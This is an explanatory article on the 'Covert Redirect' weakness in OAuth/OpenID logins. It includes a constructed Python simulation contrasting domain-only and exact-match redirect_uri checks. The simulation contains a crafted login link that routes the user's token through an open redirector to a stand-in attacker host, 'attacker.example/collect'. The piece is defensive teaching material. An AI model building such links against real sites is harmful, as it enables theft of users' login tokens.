“… it’s not easy to fix, and any effective remedies would negatively impact the user experience. Just another example that Web security is fundamentally broken and the powers that be have little incentive to address the inherent flaws.”
– Jeremiah Grossman, founder and interim CEO at WhiteHat Security
If you visit a lot of different websites, you’ve probably seen some that let you log in with your Facebook or Google account. This is meant to make life easier for everyone: you don’t have to create yet another account and remember a separate password, and the site owners don’t have to build and maintain their own membership system.
Unfortunately, the way many websites accept that login has a weakness. Unlike Heartbleed, this isn’t a bug in one piece of open-source code that a patch can fix; it’s a flaw in how sites and identity providers put the OAuth and OpenID protocols together, which is why it has been nicknamed “Covert Redirect”. Here’s how it works. When you approve a login, the provider (Facebook, Google, etc.) sends your browser back to the requesting site together with a token that proves who you are. The return address is supplied as part of the login request, and many providers only check that it points somewhere on the right site rather than at the exact address the site registered. If the legitimate site also has an “open redirect” (a page that forwards visitors to any address it is handed), an attacker can craft a login link that uses the real site’s identity, shows you a genuine Facebook or Google consent screen, and then bounces your browser, token and all, to a site they control. Because no fake login page is involved and you never type your password anywhere unusual, this is much harder to spot than ordinary phishing. With that token the attacker can read whatever information you authorized the site to see and, depending on what the site does with it, may be able to act as you on the legitimate site.
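To make the mechanism concrete, here is a small simulation. It is an added example written for this page, not code from any affected site or provider; the hostnames (shop.example, attacker.example), the client ID, the token value and the `/redirect?url=` open redirector are all constructed for illustration. It shows the two checks a provider might apply to the return address: a domain-only match, which Covert Redirect exploits, and an exact match against the registered URI, which RFC 6749 (sections 3.1.2.2 and 3.1.2.3) recommends. The token travels in the URL fragment, as in the OAuth implicit flow, and browsers re-attach the fragment when a 302 response’s Location has none.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed example data: a client site "shop.example" registered with an
# identity provider. Only this exact callback URL is on file with the provider.
CLIENT_ID = "shop-app"
REGISTERED_REDIRECT_URIS = {CLIENT_ID: {"https://shop.example/oauth/callback"}}
TOKEN_FRAGMENT = "access_token=SECRET_TOKEN&token_type=bearer"  # constructed token


def redirect_uri_allowed_weak(client_id, redirect_uri):
    """Domain-only check: accepts any https URL on a registered host.
    This looseness is what Covert Redirect relies on."""
    parts = urlsplit(redirect_uri)
    hosts = {urlsplit(u).hostname for u in REGISTERED_REDIRECT_URIS.get(client_id, ())}
    return parts.scheme == "https" and parts.hostname in hosts


def redirect_uri_allowed_strict(client_id, redirect_uri):
    """Exact string comparison against the registered URIs, as RFC 6749
    sections 3.1.2.2 and 3.1.2.3 recommend."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, set())


def provider_authorize(client_id, redirect_uri, check):
    """Simulated identity provider, implicit flow. After the user consents,
    return the Location the browser is sent to (token in the URL fragment),
    or None if the redirect_uri is refused."""
    if not check(client_id, redirect_uri):
        return None
    return f"{redirect_uri}#{TOKEN_FRAGMENT}"


def client_site(url):
    """Simulated client site. /redirect?url=... is a hypothetical open
    redirector that answers 302 to any target it is given. A browser following
    a 302 whose Location has no fragment keeps the current fragment, so the
    token rides along to the target (RFC 7231 section 7.1.2)."""
    parts = urlsplit(url)
    if parts.hostname != "shop.example":
        return url  # the browser is already on some other site
    if parts.path == "/redirect":
        target = parse_qs(parts.query).get("url", [None])[0]
        if target:
            if parts.fragment and "#" not in target:
                return f"{target}#{parts.fragment}"
            return target
    return url  # /oauth/callback or any other page: the browser stays here


def run_flow(check, requested_redirect_uri):
    """Run one login with the given redirect_uri check and return the hostname
    that ends up holding the token, or None if the provider refused the URI."""
    location = provider_authorize(CLIENT_ID, requested_redirect_uri, check)
    if location is None:
        return None
    final_url = client_site(location)
    return urlsplit(final_url).hostname


if __name__ == "__main__":
    legit = "https://shop.example/oauth/callback"
    # Attacker-crafted login link: genuine client, genuine host, but the path
    # is the open redirector and it points at the attacker's collector.
    crafted = "https://shop.example/redirect?url=https://attacker.example/collect"
    for name, check in (("weak", redirect_uri_allowed_weak),
                        ("strict", redirect_uri_allowed_strict)):
        print(f"{name:6} legit   -> token lands at {run_flow(check, legit)}")
        print(f"{name:6} crafted -> token lands at {run_flow(check, crafted)}")
```

Run with the weak check, the crafted link delivers the token to attacker.example even though the user only ever saw the real provider’s consent screen; with the strict check the same request is refused before any token is issued, while the legitimate callback still works. Closing the open redirector on the client side helps too, but exact-match registration at the provider is the fix that doesn’t depend on every client getting it right.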
Covert Redirect bug (OAuth / OpenID) – What you need to know …

